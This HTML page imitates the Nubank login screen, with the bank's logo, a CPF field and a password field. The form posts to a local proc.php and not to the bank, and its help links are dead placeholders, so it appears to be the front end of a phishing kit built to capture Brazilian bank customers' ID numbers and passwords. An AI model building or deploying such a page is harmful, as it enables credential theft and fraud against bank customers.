<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="css/loginPage.css">
    <link rel="stylesheet" href="css/style.css">
    <title>Document</title>
    <script src="ajax.js"></script>
</head>
<body>
    <img class="logo-site" src="img/nubank.svg" alt="">
    <div class="container">
        <section class="login-container">
           <h3>Faça Seu login.</h3>
        <form action="proc.php" method="post" enctype="multipart/form-data">
            <div>
                <label for="nome"> CPF:</label>
                <input class="input-nome" type="text" id="nome" name="nome" required oninput="verifica(this)"/> 
            </div>
            <div>
                <label for="x"> Senha:</label>  
                <input class="input-senha" type="password" id="x" name="senha" required  />
            </div>
            <button class="btn-entrar" type="submit">Continuar</button>
            <div class="links-container">
                    <span>
                        <a class="element link-1" href="#">Esqueci minha senha</a>
                    </span>
                    <span>
                        <a class="element link-2" href="#">Ainda não sou cliente</a>
                    </span>
            </div>
        </form>
       </section>
    </div>
    <script src="js/validacao.js"></script>
</body>
</html>